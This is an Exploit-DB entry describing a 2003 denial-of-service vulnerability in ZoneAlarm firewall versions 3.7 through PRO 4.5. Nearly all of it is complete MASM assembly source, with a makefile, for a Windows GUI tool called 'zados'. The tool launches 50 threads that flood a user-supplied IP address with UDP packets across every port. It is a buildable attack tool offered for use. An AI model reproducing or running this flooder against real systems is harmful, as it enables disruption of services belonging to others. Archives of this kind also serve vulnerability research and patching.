ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service Vulnerability 3

2003-09-02T00:00:00
ID EDB-ID:23090
Type exploitdb
Reporter Igor Franchuk
Modified 2003-09-02T00:00:00

Description

ZoneAlarm 3.7 .202/PRO 4.0/PRO 4.5 Random UDP Flood Denial Of Service Vulnerability (3). Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/8525/info
  
A denial of service vulnerability has been alleged in ZoneAlarm. It is reportedly possible to reproduce this condition by sending a flood of UDP packets of random sizes to random ports on a system hosting the vulnerable software.

;//		          This is threadable UDP spammer
;/
;//
;//					 igor@email.ru  Igor Franchuk
;//						    
;//---------------------------------------------------------------------------

; #########################################################################
	.386
	.model flat, stdcall  
	option casemap :none  
	include \masm32\include\windows.inc
	include \masm32\include\kernel32.inc
	includelib \masm32\lib\kernel32.lib
	include \masm32\include\user32.inc 
	includelib \masm32\lib\user32.lib
	include \masm32\include\advapi32.inc
	includelib \masm32\lib\advapi32.lib
	include \masm32\include\comctl32.inc
	includelib \masm32\lib\comctl32.lib
	include \masm32\include\ws2_32.inc
	includelib \masm32\lib\ws2_32.lib

; #########################################################################
WinMain		 proto :DWORD,:DWORD,:DWORD,:DWORD
SetTransparency  proto :DWORD,:BYTE
GetRegString     proto :DWORD,:DWORD,:DWORD,:DWORD
Spam	 	 proto :DWORD
; #########################################################################
	.DATA	
 	 ClassName db "ZADOSWndClassObject",0
	 Caption   db "ZoneAlarm DOS test",0
	 User32lib db "user32",0
 	 SetLayeredWindowAttributesName db "SetLayeredWindowAttributes",0
 	 SBuf	   db 255,255,255,255,255,255,255,255,255,255,255,255
	 IPEditBox db "SysIPAddress32",0
         BtnName   db "button",0 
 	 OKBtnCaption db "Spam",0 
	 msgEmptyAdr  db "Invalid IP",0 
 	 msgWinSockErrorAdr db "WinSocket 2.0 is required. WSAStartup failed",0
	 msgWinSockErrorSock db "Invalid socket",0
 	 CancelBtnCaption db "Cancel",0 
 	 ProtoName  db "udp",0
 	 CThread     DWORD 0
 	 GThreadExit DWORD 0
	.DATA?
	 hInstance   HANDLE ?	
	 hIPEditWnd  HANDLE ?
	 hwndOKBtn      HANDLE ?
	 hwndCancelBtn  HANDLE ?
	 icex        INITCOMMONCONTROLSEX <> ;structure for DateTimePicker
	 tIPAdr     DWORD ?
	 Socket	    DWORD ?
	 tIPAdrSN   HANDLE ?
         WSAData    WSADATA <> 
	 SIN 	    sockaddr_in <>
	 TID        HANDLE ?

	 PROTOENTSTRUCT STRUCT
	   p_name    DWORD ?
	   p_aliases DWORD ?
	   p_proto   DWORD ?
 	 PROTOENTSTRUCT  ENDS

	.CONST
	 WS_EX_LAYERED  equ 80000h
	 LWA_ALPHA      equ 2h
	 IPEditID       equ 100h
	 OKBtnID        equ 200h	 
	 CancelBtnID    equ 201h	 
	 IPM_ISBLANK    equ (WM_USER+105)
	 IPM_GETADDRESS equ (WM_USER+102)

; #########################################################################
REVERSE MACRO ip
	push ebx
	mov ebx, ip
	xchg bh, bl
	mov ax, bx
	shr ebx, 16
	xchg bh, bl
	shl eax, 16
	mov ax, bx
	pop ebx
ENDM

MAKEWORD MACRO bLow, bHigh
    mov eax, bLow
    mov ebx, bHigh
    shl ebx, 8
    xor eax, ebx
ENDM
; #########################################################################
	.CODE
start:
;	#Init
        invoke GetModuleHandle, NULL; get the instance handle of our program.
        mov hInstance,eax
        invoke GetCommandLine; get the instance handle of our program.
	invoke WinMain, hInstance,NULL,eax, SW_SHOWDEFAULT        ; call the main function 
	invoke ExitProcess,0 
; #########################################################################
WinMain proc hInst:HINSTANCE, hPrevInst:HINSTANCE, lpCmdLine:HANDLE, mCmdShow:DWORD
	LOCAL wc:WNDCLASSEX
	LOCAL msg:MSG 
	LOCAL hWnd:HWND 
        mov   wc.cbSize,SIZEOF WNDCLASSEX
	mov   wc.style,CS_DBLCLKS + CS_HREDRAW + CS_VREDRAW
	mov   wc.lpfnWndProc, OFFSET WndProc 
	mov   wc.cbClsExtra,NULL
	mov   wc.cbWndExtra,NULL
	push  hInst
	pop   wc.hInstance
	mov   wc.hbrBackground,COLOR_WINDOW+1
	mov   wc.lpszMenuName,NULL 
	mov   wc.lpszClassName,OFFSET ClassName 
	invoke LoadIcon,NULL,IDI_APPLICATION
	mov   wc.hIcon,eax 
	mov   wc.hIconSm,eax 
	invoke LoadCursor,NULL,IDC_ARROW 
	mov   wc.hCursor,eax 
	invoke RegisterClassEx, addr wc   
;#			WS_EX_LEFT+ WS_EX_LTRREADING + WS_EX_TOOLWINDOW,\
	invoke CreateWindowEx,\
			WS_EX_LEFT+ WS_EX_LTRREADING + WS_EX_TOOLWINDOW + WS_EX_WINDOWEDGE,\
        	        ADDR ClassName,\ 
                	ADDR Caption,\ 
	                16CC0000h,\
        	        CW_USEDEFAULT,\ 
                	CW_USEDEFAULT,\ 
	                256,\ 
        	        118,\ 
	                NULL,\ 
        	        NULL,\ 
	                hInst,\ 
	                NULL 
 	mov   hWnd,eax 
        invoke SetTransparency,hWnd,200
        invoke ShowWindow, hWnd, mCmdShow
        invoke UpdateWindow, hWnd
	.WHILE TRUE                                                         ; Enter message loop 
            invoke GetMessage, ADDR msg,NULL,0,0 
            .BREAK .IF (!eax) 
            invoke TranslateMessage, ADDR msg 
            invoke DispatchMessage, ADDR msg 
        .ENDW 
	mov     eax,msg.wParam                                            ; return exit code in eax 
	ret
WinMain endp
; #########################################################################
SetTransparency proc hWnd:HANDLE, bAlpha:BYTE
   LOCAL hLib:HANDLE
   LOCAL SetLayeredWindowAttr:HANDLE
   LOCAL WInfo:DWORD
   invoke LoadLibrary,addr User32lib
   mov hLib,eax
   .IF eax 
      invoke GetProcAddress, hLib, addr SetLayeredWindowAttributesName
      mov SetLayeredWindowAttr, eax
      .IF eax
	 invoke GetWindowLong,hWnd,GWL_EXSTYLE
	 or eax, WS_EX_LAYERED
         invoke SetWindowLong, hWnd, GWL_EXSTYLE, eax
         push LWA_ALPHA
	 xor eax,eax
         mov al,bAlpha
         push eax
         push NULL
         push hWnd
         call [SetLayeredWindowAttr]
      .ENDIF
      invoke FreeLibrary,hLib
   .ENDIF
   ret
SetTransparency endp
; #########################################################################
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM 
    LOCAL protoent:DWORD
    mov eax, uMsg
    .IF eax==WM_DESTROY                           ; if the user closes our window 
        invoke PostQuitMessage,NULL             ; quit our application 
    .ELSEIF eax==WM_CREATE 
        invoke  InitCommonControls
        invoke CreateWindowEx,NULL,ADDR IPEditBox,NULL,\
                   WS_VISIBLE or WS_BORDER or WS_CHILD,11,\
                   90,180,25,hWnd,IPEditID,\
                   hInstance,NULL
	mov hIPEditWnd,eax
        invoke CreateWindowEx,NULL, ADDR BtnName,ADDR OKBtnCaption,\ 
                        WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON or BS_FLAT,\ 
                        35,50,80,25,hWnd,OKBtnID,hInstance,NULL
	mov hwndOKBtn,eax

        invoke CreateWindowEx,NULL, ADDR BtnName,ADDR CancelBtnCaption,\ 
                        WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON or BS_FLAT,\ 
                        134,50,80,25,hWnd,CancelBtnID,hInstance,NULL
	mov hwndCancelBtn,eax
        INVOKE EnableWindow,hwndCancelBtn,FALSE

	invoke SetTransparency, hwndOKBtn, 500

	invoke SetFocus,hIPEditWnd
    .ELSEIF eax==WM_SIZE 
	mov eax,lParam                                        
        mov edx,eax 
        shr edx,16
        and eax,0ffffh
	mov ebx, eax
	shr ebx,1
	sub ebx,90
	mov ecx,ebx
	add ecx,99
	push ecx
        invoke MoveWindow,hIPEditWnd,ebx,10,180,25,TRUE
        invoke MoveWindow,hwndOKBtn,ebx,50,80,25,TRUE
        pop ecx
        invoke MoveWindow,hwndCancelBtn,ecx,50,80,25,TRUE
;	invoke MoveWindow,hwndStatus,0,0,0,0,TRUE
    .ELSEIF eax==WM_COMMAND
	mov eax,wParam
       .IF lParam == 0;from what window hWnd = 0 - main, !=0 - from a child control
       .ELSE
         .IF ax==OKBtnID;what control
            shr eax,16
           .IF ax==BN_CLICKED;what message
   	      invoke SendMessage, hIPEditWnd, IPM_ISBLANK, 0, 0
   	      .IF !EAX
		 invoke SendMessage, hIPEditWnd, IPM_GETADDRESS, 0, ADDR tIPAdr
		 REVERSE tIPAdr
		 mov tIPAdr, eax
		 invoke inet_ntoa, tIPAdr
        	 mov tIPAdrSN, eax
                 invoke MessageBox,NULL, tIPAdrSN,tIPAdrSN,MB_OK + MB_SYSTEMMODAL
                 MAKEWORD 2, 0
		 invoke WSAStartup,eax,ADDR WSAData

;invoke WSAStartup,101h,addr WSAData             ;initialise le socket           
		 .IF !eax
                    invoke getprotobyname, ADDR ProtoName		    
                    mov protoent, eax
		    mov edi, eax		    
                    assume edi:PTR PROTOENTSTRUCT
                    xor ebx,ebx
		    mov ebx, [edi].p_proto
		    assume edi:nothing
                    and ebx,00FFFFh		    
		    invoke socket,AF_INET,SOCK_DGRAM,ebx
		    .IF eax!=INVALID_SOCKET 
		       mov Socket, eax
		       invoke EnableWindow,hwndOKBtn,FALSE
		       invoke EnableWindow,hwndCancelBtn,TRUE
		       mov SIN.sin_family,AF_INET
		       push tIPAdr
		       pop SIN.sin_addr

                       mov GThreadExit, 0
                       xor ebx, ebx
		       .WHILE ebx < 50
	    	          mov  eax,OFFSET Spam
	    	          push ebx
 	                  invoke CreateThread,NULL,NULL,eax,ebx,NORMAL_PRIORITY_CLASS, ADDR TID
 	                  pop ebx
 	                  inc ebx
 	               .ENDW
;		       mov eax,1
; 		       invoke Spam, eax
 		    .ELSE
                       invoke WSAGetLastError
                       invoke MessageBox,hWnd,ADDR msgWinSockErrorSock,ADDR Caption,MB_OK  + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
 		    .ENDIF
                 .ELSE
                    invoke MessageBox,hWnd,ADDR msgWinSockErrorAdr,ADDR Caption,MB_OK  + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
                 .ENDIF
                 
              .ELSE
                 invoke MessageBox,hWnd,ADDR msgEmptyAdr,ADDR Caption,MB_OK  + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
	 	 invoke SetFocus,hIPEditWnd
              .ENDIF
           .ENDIF
         .ELSEIF ax==CancelBtnID;what control
            shr eax,16
           .IF ax==BN_CLICKED;what message
	      invoke EnableWindow,hwndOKBtn,TRUE
	      invoke EnableWindow,hwndCancelBtn,FALSE
	      mov GThreadExit, 1
	      invoke closesocket, Socket
           .ENDIF
         .ENDIF
       .ENDIF

    .ELSE 
        invoke DefWindowProc,hWnd,uMsg,wParam,lParam     ; Default message processing 
        ret 
    .ENDIF 
    xor eax,eax 
    ret
WndProc endp
; #########################################################################
Spam proc ThreadID:DWORD
    xor edx, edx
    mov ebx,1
    .WHILE ebx
        mov eax, ThreadID
        .IF CThread == eax
            mov ebx,0
        .ENDIF
	.IF GThreadExit == 1
            mov ebx,0
        .ENDIF
        .IF edx < 65535
           inc edx
        .ELSE
           xor edx,edx
        .ENDIF
        push edx
        push ebx
        invoke htons, edx
	mov SIN.sin_port,ax     
	invoke connect, Socket, addr SIN ,sizeof SIN
	invoke send, Socket, ADDR msgWinSockErrorAdr, 40, 0
        pop ebx
        pop edx
    .ENDW
    ret
Spam endp
end start

--------------------------------------make file-------------------------------------------

NAME=zados
$(NAME).exe: $(NAME).obj
        Link   /SUBSYSTEM:WINDOWS /LIBPATH:c:\masm32\lib $(NAME).obj
$(NAME).obj: $(NAME).asm
        ml /c /coff /Cp  $(NAME).asm